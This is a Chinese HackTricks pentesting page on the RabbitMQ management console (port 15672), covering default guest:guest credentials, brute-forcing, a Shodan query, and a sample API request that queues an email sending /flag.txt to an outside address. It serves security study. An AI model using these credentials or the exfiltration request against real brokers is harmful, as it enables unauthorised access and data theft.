2024-02-09 12:48:25 +00:00
|
|
|
|
# 15672 - RabbitMQ管理渗透测试
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
支持HackTricks的其他方式:
|
2024-01-10 06:29:36 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2024-01-10 06:29:36 +00:00
|
|
|
|
<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
如果您对**黑客职业**感兴趣并想要攻破不可攻破的系统 - **我们正在招聘!**(需要流利的波兰语书面和口头表达能力)。
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
|
|
|
|
{% embed url="https://www.stmcyber.com/careers" %}
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 基本信息
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
您可以在[**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md)中了解更多关于RabbitMQ的信息。\
|
|
|
|
|
在此端口上,如果启用了[管理插件](https://www.rabbitmq.com/management.html),您可能会找到RabbitMQ管理Web控制台。\
|
|
|
|
|
主页应该如下所示:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2021-10-18 11:21:18 +00:00
|
|
|
|
![](<../.gitbook/assets/image (270).png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 枚举
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
默认凭据为"_**guest**_":"_**guest**_"。如果不起作用,您可以尝试[**暴力破解登录**](../generic-methodologies-and-resources/brute-force.md#http-post-form)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-01-10 06:29:36 +00:00
|
|
|
|
要手动启动此模块,您需要执行:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
rabbitmq-plugins enable rabbitmq_management
|
|
|
|
|
service rabbitmq-server restart
|
|
|
|
|
```
|
2024-02-09 12:48:25 +00:00
|
|
|
|
一旦您正确进行了身份验证,您将看到管理控制台:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-09-30 10:43:59 +00:00
|
|
|
|
![](<../.gitbook/assets/image (271) (1).png>)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
另外,如果您有有效凭据,您可能会发现`http://localhost:15672/api/connections`的信息很有趣。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
还要注意,可以使用类似以下请求的服务API**将数据发布到队列中**:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
|
|
|
|
|
Host: 172.32.56.72:15672
|
|
|
|
|
Authorization: Basic dGVzdDp0ZXN0
|
|
|
|
|
Accept: */*
|
|
|
|
|
Content-Type: application/json;charset=UTF-8
|
|
|
|
|
Content-Length: 267
|
|
|
|
|
|
|
|
|
|
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
|
|
|
|
|
```
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### Shodan
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
* `port:15672 http`
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
<img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
如果您对**黑客职业**感兴趣并想要黑入无法黑入的系统 - **我们正在招聘!**(需要流利的波兰语书面和口语能力)。
|
2022-05-24 00:07:19 +00:00
|
|
|
|
|
|
|
|
|
{% embed url="https://www.stmcyber.com/careers" %}
|
|
|
|
|
|
2022-04-28 16:01:33 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
2024-01-10 06:29:36 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
支持HackTricks的其他方式:
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2024-02-09 12:48:25 +00:00
|
|
|
|
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
|
|
|
|
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|